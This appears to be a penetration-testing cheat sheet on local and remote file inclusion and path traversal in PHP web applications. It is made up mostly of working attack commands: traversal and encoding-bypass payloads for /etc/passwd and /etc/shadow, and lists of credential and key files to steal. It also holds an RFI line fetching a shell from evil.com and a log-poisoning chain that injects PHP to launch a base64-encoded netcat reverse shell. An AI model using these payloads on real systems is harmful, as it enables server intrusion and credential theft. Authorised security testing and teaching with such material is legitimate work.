LFI - RFI - Path traversal
Last updated
Last updated
curl --silent http://localhost/index.php?file=/etc/subgid
To read a php file:
http://localhost/file.php?file=php://filter/convert.base64-encode/resource=prueba.php
curl --silent http://localhost/file.php?file=php://filter/convert.base64-encode/resource=prueba.php |base64 -d 2>/dev/null
http://localhost/file.php?file=../../../../../etc/passwd
http://localhost/file.php?file=../../../../../etc/passwd?
Null byte injection:
http://localhost/file.php?file=../../../../../etc/passwd%00
curl --silent "http://localhost/index.php?file=../../../../../../../../../etc/subgid%00"
(Null byte injection was fixed after PHP 5.3.4)
curl --silent "http://localhost/index.php?file=..%2F..%2F..%2F..%2F..%2Fetc/subgid"
curl --silent "http://localhost/index.php?file=....//....//....//....//....//etc/subgid"
First encoding: %2E%2E%2Fetc%2Fpasswd
Second encoding (codify the %): %252E%252E%252Fetc%252Fpasswd
We add hundred times ./ Once the file name is bigger than 4096 bytes, the longest part get deleted so our request is converted to ../../../etc/passwd
../../../../etc/passwd/././././././<...>/.php.
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt
/etc/issue /etc/motd /etc/passwd /etc/group /etc/resolv.conf /etc/shadow /home/[USERNAME]/.bash_history o .profile ~/.bash_history o .profile $USER/.bash_history o .profile /root/.bash_history o .profile /etc/mtab /etc/inetd.conf /var/log/dmessage .htaccess config.php authorized_keys id_rsa id_rsa.keystore id_rsa.pub known_hosts /etc/httpd/logs/acces_log /etc/httpd/logs/error_log /var/www/logs/access_log /var/www/logs/access.log /usr/local/apache/logs/access_ log /usr/local/apache/logs/access. log /var/log/apache/access_log /var/log/apache2/access_log /var/log/apache/access.log /var/log/apache2/access.log /var/log/apache/error.log /var/log/apache/access.log /var/log/httpd/error_log /var/log/access_log /var/log/mail /var/log/sshd.log /var/log/vsftpd.log .bash_history .mysql_history .my.cnf /proc/sched_debug /proc/mounts /proc/net/arp /proc/net/route /proc/net/tcp /proc/net/udp /proc/net/fib_trie /proc/version /proc/self/environ
c:\WINDOWS\system32\eula.txt c:\boot.ini c:\WINDOWS\win.ini c:\WINNT\win.ini c:\WINDOWS\Repair\SAM c:\WINDOWS\php.ini c:\WINNT\php.ini c:\Program Files\Apache Group\Apache\conf\httpd.conf c:\Program Files\Apache Group\Apache2\conf\httpd.conf c:\Program Files\xampp\apache\conf\httpd.conf c:\php\php.ini c:\php5\php.ini c:\php4\php.ini c:\apache\php\php.ini c:\xampp\apache\bin\php.ini c:\home2\bin\stable\apache\php.ini c:\home\bin\stable\apache\php.ini c:\Program Files\Apache Group\Apache\logs\access.log c:\Program Files\Apache Group\Apache\logs\error.log c:\WINDOWS\TEMP\ c:\php\sessions\ c:\php5\sessions\ c:\php4\sessions\ windows\repair\SAM %SYSTEMROOT%\repair\SAM %SYSTEMROOT%\System32\config\RegBack\SAM %SYSTEMROOT%\System32\config\SAM %SYSTEMROOT%\repair\system %SYSTEMROOT%\System32\config\SYSTEM %SYSTEMROOT%\System32\config\RegBack\system
Basic example:
vuln.php?page=http://evil.com/shell.txt
Other example in which gwolle plugin is vulnerable to RFI:
http://192.168.1.X/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abs path=http://{My IP}/wp-load.php
Wrapper php://filter
Wrapper zip://
Wrapper data://
Wrapper expect://
Wrapper input://
Wrapper phar://
First we try to access to a log file
Ex: /var/log
/var/log/apache2/access.log
Then:
curl -s -H "User-Agent: <?php system('whoami'); ?> " "http://localhost/example.php?file=/var/log/apache2/access.log"
(curl means client url and it communicates with a web or application server by specifying a relevant URL and the data that need to be sent or received. In this example we add -s (silent, if fails show an error) and -H stands for extra header to include in the request)
Now we have sent a petition to that url with a defined user agent <?php system('whoami'); ?> so the web interpreted the php
In var/log/auth.log here we can see all the users trying to authenticate on the web.
So we can try authenticating with and invalid user.
Here we are trying to define a command as an usser
This will depend on whats the web runing behind, look at pentest monkey to see comands depending on this.
nc -nlvp 443 (first we listen in the port 443)
First try is working with our own machine (nc -e /bin/bash "our ip")
Then we are trying to athenticate in the system with the previous command to send to our machine the shell.
echo "nc -e /bin/bash "our ip"" | base64; echo (Here we codify the previous command in base 64 to have no problems with the system lecture)
echo ""codify command in base 64"" | base64 -d | bash (Here we have the command to decodify the previous command and execute it with bash)
Now we try to inject php code and run this command:
ssh '<?php system("echo "codify command in base 64" | base64 -d | bash"); ?>'@"target" Here we run the command and try getting a reverse shell.
Then we put an invalid password
Now in the window of the terminal we are listening to the port 443 (nc -nlvp 443) if we put whoami we can prove we are in the system and now we can run commands (ex: script/dev/null -c bash)
https://github.com/kurobeats/fimap
To perform a single scan that tries LFI and audit against a single url:
fimap.py –s –u http://target-site.com/index2.php?x=
To run a scan using the Harvester (use root directory of a site and it will automatically crwal the web, use -d to set a crawl depth):
fimap.py –H –u http://target-site.com/ -w output.txt
To test RFI:
fimap.py –test-rfi
https://github.com/machine1337/lfiscan
https://github.com/wireghoul/dotdotpwn
dotdotpwn -m http-url -d 10 -f /etc/passwd -u "{link extracted with paramspider or similar tool}=TRAVERSAL" -b -ñ "root:"
dotdotpwn -m http-url -d 10 -f /etc/shadow -u "{link extracted with paramspider or similar tool}=TRAVERSAL" -b -ñ "admin:"
